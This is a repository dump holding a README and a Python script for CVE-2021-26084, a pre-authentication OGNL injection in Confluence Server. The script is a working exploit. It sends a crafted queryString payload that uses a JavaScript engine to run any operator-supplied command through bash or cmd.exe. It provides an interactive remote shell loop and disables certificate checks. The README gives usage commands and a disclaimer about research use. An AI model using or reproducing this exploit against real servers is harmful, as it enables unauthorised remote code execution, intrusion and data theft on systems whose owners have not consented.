├── README.md └── Confluence_OGNLInjection.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-26084 - Confluence Server Webwork OGNL injection 2 | 3 | - An OGNL injection vulnerability exists that would allow an authenticated user and in some instances unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 4 | 5 | 6 | ### IMPORTANT 7 | This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission. 8 | 9 | 10 | #### • queryString param Request 11 | ![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/131630570-857df5dd-525d-43ec-9466-5c92ac9c1322.png) 12 | 13 | 14 | ### Exploit Usage 15 | 16 | #### Commands: 17 | `$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com ` 18 | 19 | #### or 20 | `$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x ` 21 | 22 | 23 | 24 | #### • Exploitation with Confluence_OGNLInjection.py 25 | ![Exploit](https://user-images.githubusercontent.com/6265911/131630805-147628fc-7772-47be-943e-12d24b052adb.png) 26 | 27 | 28 | 29 | - References: 30 | 31 | https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html 32 | 33 | https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md 34 | 35 | https://www.exploit-db.com/exploits/50243 36 | -------------------------------------------------------------------------------- /Confluence_OGNLInjection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | # Exploit Title: Confluence Server Webwork OGNL injection (PreAuth-RCE) 4 | # Google Dork: N/A 5 | # Date: 09/01/2021 6 | # Exploit Author: h3v0x 7 | # Vendor Homepage: https://www.atlassian.com/ 8 | # Software Link: https://www.atlassian.com/software/confluence/download-archives 9 | # Version: All < 7.12.x versions before 7.12.5 10 | # Tested on: Linux Distros 11 | # CVE : CVE-2021-26084 12 | 13 | # References: 14 | # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html 15 | # https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md 16 | 17 | import requests 18 | import optparse 19 | from bs4 import BeautifulSoup 20 | import optparse 21 | from requests.packages import urllib3 22 | urllib3.disable_warnings() 23 | 24 | parser = optparse.OptionParser() 25 | parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com") 26 | parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x") 27 | 28 | options, args = parser.parse_args() 29 | session = requests.Session() 30 | 31 | url_vuln = options.url 32 | endpoint = options.path 33 | 34 | 35 | if not options.url: 36 | 37 | print('[+] Specify an url target') 38 | print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') 39 | print('[+] Example help usage: exploit.py -h') 40 | exit() 41 | 42 | 43 | def banner(): 44 | 45 | print('---------------------------------------------------------------') 46 | print('[-] Confluence Server Webwork OGNL injection') 47 | print('[-] CVE-2021-26084') 48 | print('[-] https://github.com/h3v0x') 49 | print('--------------------------------------------------------------- \n') 50 | 51 | 52 | def cmdExec(): 53 | 54 | while True: 55 | 56 | cmd = input('> ') 57 | 58 | xpl_url = url_vuln + endpoint 59 | xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", 60 | "Connection": "close", 61 | "Content-Type": "application/x-www-form-urlencoded", 62 | "Accept-Encoding": "gzip, deflate"} 63 | xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} 64 | rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False) 65 | 66 | soup = BeautifulSoup(rawHTML.text, 'html.parser') 67 | queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] 68 | print(queryStringValue) 69 | 70 | 71 | banner() 72 | cmdExec() 73 | 74 | --------------------------------------------------------------------------------